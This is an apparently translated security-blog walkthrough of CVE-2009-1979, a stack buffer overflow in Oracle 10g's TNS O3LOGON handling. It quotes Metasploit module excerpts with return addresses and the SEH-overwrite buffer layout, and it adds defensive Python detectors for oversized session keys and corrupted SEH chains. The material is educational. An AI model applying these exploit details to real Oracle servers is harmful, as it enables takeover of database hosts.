Oracletns exploits Oracle's operating system to invade Oracle

Source: Internet
Author: User
Tags cve

Background

As database intrusion techniques have developed, attacks are no longer aimed only at the database itself but extend to the components built around it (even the middleware).

As one of Oracle's core components, TNS (Transparent Network Substrate) is primarily responsible for using the Oracle protocol configuration to select a transport protocol that both the client and the server support. TNS not only defines the communication protocol between the database and the client, it is also responsible for authenticating the client (confirming that the user name and password the client presents are legitimate). Simply put, if TNS has an exploitable flaw, it can be a direct route into Oracle. There are three ways to use TNS to break into Oracle:

1. Hijack TNS messages, redirecting the Oracle login information to the attacker's machine to obtain sensitive information, even the Oracle administrator account password. See the An Huaqin database security lab article "Oracle Database vulnerability without USER/PASSWORD fast intrusion".

2. Directly decrypt the Oracle login key that is transmitted encrypted inside TNS. See the An Huaqin database security lab article "See Recruit, Break Oracle password".

3. Through a buffer overflow: when Oracle processes an abnormal TNS parameter, control of the operating system underneath Oracle is obtained.

This article describes method 3 specifically: exploiting a buffer overflow in TNS to break into the operating system that hosts Oracle. The example used is CVE-2009-1979. It draws on the original author's attack code, uses Metasploit as the attack tool, and targets Oracle 10g (10.2.0.1.0) on Windows 2003 SP1.

Vulnerability description

CVE-2009-1979 (original author's code: http://www.securityfocus.com/archive/1/507598). The flaw, put simply: after the client and server have agreed on the authentication mechanism to use, O3LOGON authentication is performed (the protocol by which the client proves to the database that it holds a legitimate key); every database login goes through the O3LOGON protocol. In this protocol, after the client obtains AUTH_SESSKEY from the database, it sends back a corresponding AUTH_SESSKEY and AUTH_PASSWORD. In Oracle 10g versions 10.1.0.5 through 10.2.0.4, the length of the AUTH_SESSKEY sent by the client is not properly limited, which turns this injection point into a buffer overflow. A normal AUTH_SESSKEY is 64 bits long (as shown in the original figure). If the AUTH_SESSKEY is longer than 64 bits, memory variables adjacent to AUTH_SESSKEY can be modified, with unpredictable results.


Knowing that there is an injection point in AUTH_SESSKEY is not enough; to use the injection point in a targeted way one must also understand how AUTH_SESSKEY is stored in memory. Since AUTH_SESSKEY is a parameter received by TNS, the way it is stored in memory is closely tied to how TNS stores messages. The client sends packets to the server through several layers of software; for ease of understanding we simplify the process. The client's information is passed to the client's local TNS, the local TNS formats it and hands it to the operating system protocol stack, the protocol stack passes it over the network to the server's protocol stack, from there the message is passed to the server's TNS, and finally Oracle consumes the information that TNS passed in. This process can roughly be regarded as taking place on the system stack, so CVE-2009-1979 can basically be considered a stack buffer overflow vulnerability: a stack buffer overflow attack using an abnormally long AUTH_SESSKEY value. For the principle of stack buffer overflows, see the article "Windows Buffer overflow principle (Stack)" published by the An Huaqin database security lab.
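As an added defensive example (not part of the original article or of the Metasploit module), the check below parses a TNS DATA packet and flags an AUTH_SESSKEY value longer than the normal length of 64 that the article gives (measured here as bytes of the value). The TNS header layout is the standard one; the position of the value inside the O3LOGON payload is located heuristically rather than by a full TTC parser, and the sample packets and their key/value framing are constructed.

```python
import struct

TNS_TYPE_DATA = 6        # TNS packet type of a DATA packet
NORMAL_SESSKEY_LEN = 64  # length of a normal AUTH_SESSKEY value (from the article)
OVERFLOW_LEN = 0x1aa     # 426 bytes: the length needed to reach the SEH record (from the article)


def parse_tns_packet(pkt: bytes):
    """Return (packet_type, payload) for one TNS packet.

    Header (8 bytes): length (BE16), packet checksum, type (8 bits), reserved,
    header checksum. DATA packets carry two bytes of data flags before the payload.
    """
    if len(pkt) < 8:
        raise ValueError("truncated TNS header")
    length, _csum, ptype, _resv, _hcsum = struct.unpack(">HHBBH", pkt[:8])
    if length != len(pkt):
        raise ValueError("TNS length field does not match captured size")
    payload = pkt[8:]
    if ptype == TNS_TYPE_DATA:
        payload = payload[2:]  # skip data flags
    return ptype, payload

def extract_sesskey(payload: bytes):
    """Heuristically pull the AUTH_SESSKEY value out of an O3LOGON auth payload.

    Assumption: the value is whatever sits between the key name and the next
    'AUTH_' key (or the end of the payload), with framing bytes <= 0x20 trimmed.
    A full TTC key/value parser would read the explicit length fields instead.
    """
    start = payload.find(b"AUTH_SESSKEY")
    if start < 0:
        return None
    start += len(b"AUTH_SESSKEY")
    end = payload.find(b"AUTH_", start)
    return payload[start:end if end >= 0 else len(payload)].strip(bytes(range(0x21)))

def oversized_sesskey(pkt: bytes, max_len: int = NORMAL_SESSKEY_LEN) -> bool:
    """True if a DATA packet carries an AUTH_SESSKEY longer than max_len bytes."""
    ptype, payload = parse_tns_packet(pkt)
    if ptype != TNS_TYPE_DATA:
        return False
    value = extract_sesskey(payload)
    return value is not None and len(value) > max_len

def build_data_packet(pairs) -> bytes:
    """Constructed sample DATA packet: key NUL value NUL ... (simplified framing)."""
    body = b"\x00\x00" + b"".join(k + b"\x00" + v + b"\x00" for k, v in pairs)
    return struct.pack(">HHBBH", 8 + len(body), 0, TNS_TYPE_DATA, 0, 0) + body

# Constructed samples: a normal 64-character session key and an overflow-length one.
NORMAL_PKT = build_data_packet([(b"AUTH_SESSKEY", b"A" * 64), (b"AUTH_PASSWORD", b"B" * 64)])
OVERFLOW_PKT = build_data_packet([(b"AUTH_SESSKEY", b"A" * OVERFLOW_LEN), (b"AUTH_PASSWORD", b"B" * 64)])
```

On real captures the heuristic may swallow a few framing bytes, so an alert threshold somewhat above 64 avoids false positives while still catching a 426-byte value.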

Code explanation

For a more detailed explanation of the vulnerability's mechanism, refer directly to the Metasploit module for it. The structure of the module body is:

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = GreatRanking

      include Msf::Exploit::Remote::Tns
      include Msf::Exploit::Remote::Seh

      def initialize(info = {})
        # ...
      end

      def check
        # ...
      end

      def exploit
        # ...
      end
    end

There are only two core functions, initialize() and exploit(). initialize mainly describes the exploit; exploit performs the actual buffer overflow attack. The other functions are not part of the key logic, so this article does not describe them.

The core code of initialize is:

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'           => 0x17e,
          'BadChars'        => "",    # None, thx memcpy!
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Oracle 10.2.0.1.0 Enterprise Edition',
            {
              # untested
              'Ret' => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3
            }
          ],
          [ 'Oracle 10.2.0.4.0 Enterprise Edition',
            {
              # tested OK - 2010-jan-20 - jduck
              'Ret' => 0x01347468 # p/p/r in oracle.exe v10.2.0.3
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 20 2009')

The initialize function describes the conditions under which the vulnerability is exploited (the key points are marked in red in the figure); it describes an SEH-based method of exploiting the stack buffer overflow. Payload here refers to the pure shellcode, not the whole string injected at the injection point (the value that makes up AUTH_SESSKEY). Note in particular that the space available to the shellcode within the stack is limited to 382 bytes. BadChars lists the characters that may not be used as padding. There is no restriction on padding characters on Windows 2003 (the restriction exists to keep the padding characters from corrupting the shellcode; different instruction sets have different padding characters). Platform states that the operating system must be from the Windows family, because different operating systems have different stack layouts and different levels of protection against stack buffer overflows (even the same operating system at different patch levels changes API base addresses, which has a significant effect on a buffer attack). Targets lists the database versions that can be attacked and, most critically for the SEH method, the pop/pop/ret address. In this example Oracle 10.2.0.1.0 is used, so the pop/pop/ret address is 0x011b0528. The three most critical points of initialize are: 1. it states the maximum length of the shellcode; 2. it states the pop/pop/ret address for SEH that corresponds to the Oracle version; 3. it restricts the padding characters of the buffer overflow so that sploit is not destroyed by the padding.

Core code of the exploit function:

    # Forge the first 6 packets that the client sends to the database
    # ...

    # Build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY...")

    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x1aa - 0x17e)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 0x2d
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

The exploit function is primarily responsible for two tasks:

1. Forge an Oracle client that sends packets to the real database until the packet containing the AUTH_SESSKEY string is reached. The figure shows the forged packets: the exploit impersonates the client at IP 10.10.10.128, and 10.10.10.130 is the target database to break into.


2. Build the buffer overflow string sploit (build exploit buffer). The overall structure of the overflow buffer is: shellcode + random padding + short springboard + return address + long springboard. The lines are described one by one below:

First line: sploit = payload.encoded

This stores the shellcode. The function of this shellcode is to obtain operating system privileges on the attacked machine directly. It is a string of hex-encoded bytes.


Shellcode is simply a piece of code implanted into the process by the buffer overflow attack; most shellcode is written in assembly language. By the way it transfers control, shellcode is classified into jump/call, pop return, push return, jmp [reg+offset], blind return, SEH and many other types. Since shellcode is not the focus of this article, it is skipped here and will be covered in a later article devoted to shellcode. The shellcode in this article is used in the SEH way.

Second line: sploit << rand_text_alphanumeric(0x1aa - 0x17e)

This generates random padding characters. The main reason for using random characters instead of a fixed string is to keep certain protection mechanisms from flagging the data and making the experiment fail. TNS receives the data and checks it in the function KPZGKVL in oracommon10.dll. After the check, the data is copied with intel_fast_memcpy (the Intel-optimized version of memcpy that the compiler emits in place of the plain memcpy function) into the Oracle processing area. The AUTH_SESSKEY value goes through the same process, and the overflow point lies in the copy function. The copy's source address is 0x04AB99A4 and its destination address is 0x0673DB96 (all addresses in this article are those of the author's Windows 2003 SP1 machine; on systems with different patches the addresses will change), and the nearest SEH record is at 0x0673DD40. The AUTH_SESSKEY value stored at 0x04AB99A4 is copied to 0x0673DB96 by intel_fast_memcpy. Because there is no length check on the AUTH_SESSKEY value stored at 0x04AB99A4, copying to 0x0673DB96 overflows the buffer and overwrites up to 0x0673DD40 (the SEH address). To have the AUTH_SESSKEY value overwrite from 0x0673DB96 to 0x0673DD40, 426 (0x1AA) characters must be supplied; at this point only a 426-character string at 0x04AB99A4 achieves this. The initialize of this module states that the shellcode space is 382 (0x17E), which does not meet the overwrite requirement, so (0x1aa - 0x17e) padding characters are added to make sure the SEH record (0x0673DD40) is overwritten. To explain why 0x0673DD40 must be overwritten, here is a brief introduction to the part of SEH that is relevant to this example.

SEH is Windows' exception-handling mechanism. The exception handling of any program is built on SEH, and a single thread may install multiple SEH records. Even if a thread does no exception handling of its own, Windows installs a system-level SEH record when the thread is created (when no other SEH record can handle the exception, the system function is eventually called to handle it, the result being a pop-up dialog that forces the program to close).

On the stack each SEH record is 8 bytes, made up of two 4-byte members: the low-address member stores the pointer to the next record in the SEH linked list, and the high-address member stores the address of the exception handler. When an exception occurs, the pointer to the SEH chain is read from the TEB (thread environment block), and the records are visited one by one from the nearest to the exception trigger point outward; if the nearest record can handle the exception, it does so, and if not, control moves along the chain to the next record, and so on until the exception is handled. The end of the SEH chain is marked by ffffffff; the last record is the system-created SEH installed when the thread started.



The SEH method of buffer overflow is to use a string to overwrite the SEH record in the chain that is nearest to the exception trigger point, replacing the SEH handler (at 0x0673DD44) with the address of a pop/pop/ret sequence (0x11b0528). The handler is tricked into executing pop/pop/ret, which in the end puts the address of the pointer-to-next-SEH-record into EIP, so the ret lands in the pointer-to-next-SEH-record field. The process is: when the exception is triggered, a stack frame is created automatically for the exception and the SEH handler is called with that new frame. One field of the SEH structure, EstablisherFrame, points to the exception registration record; the address of the pointer-to-next-SEH-record is pushed onto the stack and ends up at esp+8. When the handler overwritten with pop/pop/ret runs, the first pop removes the top 4 bytes of the stack, the next pop removes another 4 bytes, and finally ret moves the value now at the top of the stack (the pointer-to-next-SEH-record address) into EIP. So the SEH handler overwritten with pop/pop/ret jumps back to the pointer-to-next-SEH-record field.

Since the pointer-to-next-SEH-record field has been rewritten as EB 06 plus 2 random characters (a short jump over the next 6 bytes), the rewritten SEH handler is skipped and execution continues with the content after the SEH handler. If that content is the shellcode, or a jump to the shellcode, execution enters the shellcode.
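As an added example (not from the original article), the following walks an SEH chain laid out as described above, 8-byte records of next pointer and handler ending in ffffffff, and applies a SEHOP-style validation: an intact chain reaches the system final handler, while a record whose next pointer has been overwritten with EB 06 plus two filler bytes cannot be followed. The stack image, the handler addresses and the final-handler address are constructed placeholders; 0x0673DD40 and 0x011b0528 are the article's addresses.

```python
import struct

STACK_BASE = 0x0673D000     # constructed: lowest address of the sample stack image
STACK_SIZE = 0x1000
CHAIN_END = 0xFFFFFFFF      # terminator of the SEH chain
FINAL_HANDLER = 0x7C830000  # constructed placeholder for the system-installed final handler


def read_record(stack: bytes, addr: int):
    """Read one 8-byte SEH record (next pointer, handler) from the sample stack."""
    off = addr - STACK_BASE
    if addr % 4 or off < 0 or off + 8 > len(stack):
        raise ValueError(f"SEH record at {addr:#010x} is misaligned or off the stack")
    return struct.unpack("<II", stack[off:off + 8])

def walk_seh_chain(stack: bytes, head: int):
    """Follow the chain from the TEB's head pointer; return [(addr, next, handler), ...]."""
    chain, addr = [], head
    while addr != CHAIN_END:
        nxt, handler = read_record(stack, addr)
        chain.append((addr, nxt, handler))
        if len(chain) > 64:
            raise ValueError("SEH chain loops or is implausibly long")
        addr = nxt
    return chain

def chain_is_valid(stack: bytes, head: int) -> bool:
    """SEHOP-style check: the chain must be walkable and end in the final handler."""
    try:
        chain = walk_seh_chain(stack, head)
    except ValueError:
        return False
    return bool(chain) and chain[-1][2] == FINAL_HANDLER

def build_stack(records: dict) -> bytes:
    """Constructed stack image from {record_addr: (next, handler)}, little-endian."""
    stack = bytearray(STACK_SIZE)
    for addr, (nxt, handler) in records.items():
        off = addr - STACK_BASE
        stack[off:off + 8] = struct.pack("<II", nxt, handler)
    return bytes(stack)

# Constructed: the record nearest the fault sits at 0x0673DD40 (address from the article)
# and links through one more record to the thread's final, system-installed record.
HEAD = 0x0673DD40
INTACT = build_stack({HEAD: (0x0673DE80, 0x01200010),  # handler addresses are placeholders
                      0x0673DE80: (0x0673DFF8, 0x01200020),
                      0x0673DFF8: (CHAIN_END, FINAL_HANDLER)})
# After the overflow the same record holds "EB 06 41 41" as its next pointer (0x414106EB
# read little-endian) and the article's pop/pop/ret address 0x011b0528 as its handler.
OVERWRITTEN = build_stack({HEAD: (0x414106EB, 0x011B0528),
                           0x0673DE80: (0x0673DFF8, 0x01200020),
                           0x0673DFF8: (CHAIN_END, FINAL_HANDLER)})
```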

Third line: sploit << generate_seh_record(mytarget.ret)

The function generate_seh_record generates the 4-byte short springboard that overwrites the pointer-to-next-SEH-record (EB 06 plus two random characters) and the return address that overwrites the SEH handler (the pop/pop/ret address 0x11b0528), completing the overwrite of the SEH record so that control jumps to the shellcode or to the next springboard.

Fourth line: sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

This statement is the long springboard. jmp $- denotes a negative jump (jumping backward in memory); the long springboard placed after the SEH handler, reached from the pointer-to-next-SEH-record via the short jump over the SEH handler, jumps back to the start address of sploit and begins executing the shellcode.

The whole sploit structure is: shellcode + random padding + short springboard + pop/pop/ret address + long springboard (jumping back to the shellcode at the very beginning). Finally this value is assigned to AUTH_SESSKEY and the packet containing AUTH_SESSKEY is sent to the database. At this point, to make the effect more intuitive, a script is run on the attacking machine that opens a remote connection and logs directly into the target's database with sqlplus / as sysdba, completing the attack. The effect is as follows:


This completes CVE-2009-1979. In the next article the An Huaqin database security lab will share the classification, usage, scope and limitations of the shellcode that was skipped in this article.


This article is from the Database security blog, so be sure to keep this source http://schina.blog.51cto.com/9734953/1619035

